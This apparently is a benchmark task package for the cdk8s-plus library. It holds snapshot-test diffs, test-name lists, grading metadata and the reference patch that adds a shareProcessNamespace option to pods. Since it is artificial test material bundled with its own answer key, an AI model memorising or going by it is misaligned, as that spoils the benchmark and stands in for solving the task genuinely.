-1828,6 +1850,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1873,6 +1896,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1923,6 +1947,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2034,6 +2059,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2154,6 +2180,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2204,6 +2231,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ 
-2366,6 +2394,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2478,6 +2507,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2582,6 +2612,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2661,6 +2692,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2779,6 +2811,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2896,6 +2929,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2946,6 +2980,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3072,6 +3107,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3124,6 +3160,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3293,6 +3330,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3338,6 +3376,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3388,6 +3427,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3499,6 +3539,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, 
+ "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3619,6 +3660,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3669,6 +3711,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3831,6 +3874,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3943,6 +3987,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4011,6 +4056,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4061,6 +4107,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4155,6 +4202,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4257,6 +4305,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4351,6 +4400,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4440,6 +4490,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4490,6 +4541,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4598,6 +4650,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ 
-4760,6 +4813,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4811,6 +4865,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4881,6 +4936,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4950,6 +5006,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5000,6 +5057,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5062,6 +5120,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5112,6 +5171,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5171,6 +5231,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5238,6 +5299,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5303,6 +5365,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5353,6 +5416,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5415,6 +5479,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5465,6 +5530,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, 
+ "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5524,6 +5590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5591,6 +5658,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5663,6 +5731,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5713,6 +5782,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "tolerations": Array [ Object { diff --git a/test/__snapshots__/service.test.ts.snap b/test/__snapshots__/service.test.ts.snap index 51c9d49f..d27cc7bd 100644 --- a/test/__snapshots__/service.test.ts.snap +++ b/test/__snapshots__/service.test.ts.snap @@ -95,6 +95,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/statefulset.test.ts.snap b/test/__snapshots__/statefulset.test.ts.snap index 86d6f7b3..92e3117c 100644 --- a/test/__snapshots__/statefulset.test.ts.snap +++ b/test/__snapshots__/statefulset.test.ts.snap @@ -76,6 +76,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -197,6 +198,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, },
[ "Can be isolated", "default configuration", "custom configuration", "StatefulSet gets defaults", "Can be exposed as via ingress", "exposing via a service preserves deployment namespace", "expose captures all container ports", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA 
with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "can select a deployment", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all 
pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Instantiation properties are all respected", "can mount container to a pv", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "can allow to peer across namespaces", "can allow to multiple peers", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "can allow from peer across namespaces", "can allow from multiple peers", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod 
isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload" ]
[ "Can mutate metadata", "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "defaultChild", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "can select namespaces", "can select all namespaces", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "can grant permissions on imported", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "fromCommand", "fromHttpGet", "fromTcpSocket", "minimal definition", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", 
"can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when 
minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Must be configured with at least one port", "Can provide cluster IP", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can be bounded to a volume at instantiation", "can be bounded 
to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "role can bind to imported", "secrets can be added to the service account", "auto mounting token can be disabled", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Can add only resource requests", 
"Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "mount options", "mount from ctor", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different 
volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "cannot allow to namespaces selected by labels", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "cannot allow from namespaces selected by labels", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "can grant read permissions twice with different 
subjects", "cannot grant permissions twice with same subject" ]
Method: AbstractPod.constructor(this: AbstractPod, props: AbstractPodProps) Location: src/pod.ts Inputs: `props` – an object extending `base.ResourceProps` that may contain the optional boolean `shareProcessNamespace` (default `false`). All other existing fields are unchanged. Outputs: Returns a new `AbstractPod` instance whose public read‑only property `shareProcessNamespace` is set to the value provided in `props` or `false` when omitted. This property is later emitted in the generated manifest (e.g., `"shareProcessNamespace": false`). Description: Adds support for the Kubernetes `shareProcessNamespace` flag to pods. When enabled, containers in the pod share a single Linux process namespace; otherwise they remain isolated. The default is `false` to maintain existing behavior. Function: AbstractPodProps (interface) Location: src/pod.ts Inputs: Optional field `shareProcessNamespace?: boolean` (default `false`). Outputs: None (type definition). Description: Extends the pod property interface to allow callers to request process‑namespace sharing when constructing a pod. The field is reflected in the pod manifest as `shareProcessNamespace`.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 11, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved", "backport" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/4902", "https://github.com/sorenlouv/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue only states a backport without detailing the required behavior, making the specification ambiguous (B4). The test patch adds \"shareProcessNamespace\": false to many snapshots, which aligns with the expected default in the golden implementation. No other B-category signals are present. Therefore the task is classified as B4 due to missing explicit acceptance criteria.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
6fbf94183964f0eabef493e1a7ae3e51b4d2482e
2024-11-13 21:56:17
cdk8s-team__cdk8s-plus-4902
diff --git a/src/pod.ts b/src/pod.ts index 3ac602bc..14e4dfd2 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -19,6 +19,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, public readonly dns: PodDns; public readonly dockerRegistryAuth?: secret.ISecret; public readonly automountServiceAccountToken: boolean; + public readonly shareProcessNamespace: boolean; public readonly hostNetwork?: boolean; public readonly terminationGracePeriod?: Duration; @@ -40,6 +41,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, this.dns = new PodDns(props.dns); this.dockerRegistryAuth = props.dockerRegistryAuth; this.automountServiceAccountToken = props.automountServiceAccountToken ?? false; + this.shareProcessNamespace = props.shareProcessNamespace ?? false; this.isolate = props.isolate ?? false; this.hostNetwork = props.hostNetwork ?? false; this.terminationGracePeriod = props.terminationGracePeriod ?? Duration.seconds(30); @@ -249,6 +251,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, setHostnameAsFqdn: dns.hostnameAsFQDN, imagePullSecrets: this.dockerRegistryAuth ? [{ name: this.dockerRegistryAuth.name }] : undefined, automountServiceAccountToken: this.automountServiceAccountToken, + shareProcessNamespace: this.shareProcessNamespace, hostNetwork: this.hostNetwork, terminationGracePeriodSeconds: this.terminationGracePeriod?.toSeconds(), }; @@ -437,6 +440,14 @@ export interface AbstractPodProps extends base.ResourceProps { */ readonly automountServiceAccountToken?: boolean; + /** + * When process namespace sharing is enabled, processes in a container are visible to all other containers in the same pod. + * + * @default false + * @see https://kubernetes.io/docs/tasks/configure-pod-container/share-process-namespace/ + */ + readonly shareProcessNamespace?: boolean; + /** * Isolates the pod. This will prevent any ingress or egress connections to / from this pod. 
* You can however allow explicit connections post instantiation by using the `.connections` property.
feat(pod): shareProcessNamespace add shareProcessNamespace to pod spec. Cannot find it anywhere. https://kubernetes.io/docs/tasks/configure-pod-container/share-process-namespace/
**Title** Expose `shareProcessNamespace` option on Pod resources **Problem** Users need the ability to enable process‑namespace sharing for containers within a pod, but the current pod construct does not expose this setting. Consequently, manifests cannot be configured to share the process namespace, limiting certain multi‑container patterns. **Root Cause** The pod abstraction lacked a property for the Kubernetes `shareProcessNamespace` field, so it was never serialized into the generated manifest. **Fix / Expected Behavior** - Add a Boolean flag to the pod configuration API to control process‑namespace sharing. - Default the flag to `false` to preserve existing behavior. - Ensure the flag value is correctly rendered into the pod spec under `shareProcessNamespace`. - Update documentation/comments to describe the new option and reference the official Kubernetes guidance. **Risk & Validation** - Verify that existing pods remain unchanged when the flag is omitted, maintaining backward compatibility. - Add unit tests confirming that the manifest includes `shareProcessNamespace: true` only when the flag is set. - Run integration tests to ensure the generated manifests are accepted by Kubernetes without errors.
4,902
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/container.test.ts.snap b/test/__snapshots__/container.test.ts.snap index c94d5044..ee03dfa1 100644 --- a/test/__snapshots__/container.test.ts.snap +++ b/test/__snapshots__/container.test.ts.snap @@ -68,6 +68,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -129,6 +130,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -179,6 +181,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -250,6 +253,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -306,6 +310,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "volumes": Array [ Object { diff --git a/test/__snapshots__/cron-job.test.ts.snap b/test/__snapshots__/cron-job.test.ts.snap index e8f2501a..309c040f 100644 --- a/test/__snapshots__/cron-job.test.ts.snap +++ b/test/__snapshots__/cron-job.test.ts.snap @@ -52,6 +52,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -138,6 +139,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -205,6 +207,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/daemon-set.test.ts.snap b/test/__snapshots__/daemon-set.test.ts.snap index 3b07d8a5..3ab34b83 100644 --- a/test/__snapshots__/daemon-set.test.ts.snap +++ b/test/__snapshots__/daemon-set.test.ts.snap @@ -54,6 +54,7 @@ Array [ 
